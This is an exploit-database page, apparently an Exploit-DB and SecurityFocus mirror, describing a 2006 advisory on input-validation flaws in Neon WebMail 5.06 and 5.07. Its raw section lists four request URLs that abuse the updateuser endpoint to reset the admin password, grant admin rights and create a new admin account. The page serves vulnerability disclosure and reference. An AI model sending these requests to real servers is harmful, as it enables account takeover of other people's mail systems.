header-logo
Suggest Exploit
vendor:
Neon WebMail
by:
SecurityFocus
7.5
CVSS
HIGH
Arbitrary File Upload, Arbitrary Email Manipulation, SQL Injection, Unauthorized Access, Directory Traversal, HTML Injection
20, 89, 79, 564, 22, 80
CWE
Product Name: Neon WebMail
Affected Version From: 05.06
Affected Version To: 5.07 (build.200607050)
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Multiple Input Validation Vulnerabilities in Neon WebMail

Neon WebMail is prone to multiple input-validation vulnerabilities because it fails to sanitize user-supplied input. An attacker can exploit these issues to compromise the affected application. Versions 5.06 and 5.07 (build.200607050) are vulnerable to these issue; prior versions may also be affected.

Mitigation:

Input validation should be used to ensure that untrusted data is not allowed to affect the application's logic. All input data should be validated and filtered for malicious content.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/20109/info
    
Neon WebMail is prone to multiple input-validation vulnerabilities because it fails to sanitize user-supplied input. These issues include:
    
- an arbitrary-file-upload vulnerability
- an arbitrary-email-manipulation vulnerability
- multiple SQL-injection vulnerabilities
- an unauthorized-access vulnerability
- multiple directory-traversal vulnerabilities
- an HTML-injection vulnerability. 
    
An attacker can exploit these issues to compromise the affected application.
    
Versions 5.06 and 5.07 (build.200607050) are vulnerable to these issue; prior versions may also be affected.

http://www.example.com/neonwebmail/updateuser?in_id=admin&in_pass=hacked&in_name=admin&in_admin=1&
in_showmailcount=10&in_usecss=1&in_autopoptime=5&in_replysign=&in_isquotation=1&in_formwidth=50&exe=update
http://www.example.com/neonwebmail/updateuser?in_id=guest&in_pass=guest&in_name=guest&in_admin=1&
in_showmailcount=20&in_usecss=1&in_autopoptime=5&in_poppop=1&in_replysign=&in_formwidth=80&exe=update
http://www.example.com/neonwebmail/updateuser?in_id=admin&exe=read
http://www.example.com/neonwebmail/updateuser?in_id=super&in_pass=super&in_name=super&in_admin=1&
in_showmailcount=10&in_usecss=1&in_autopoptime=5&in_replysign=&in_isquotation=1&in_formwidth=50&exe=insert

Navigation

Suggest Exploit

Services By CQR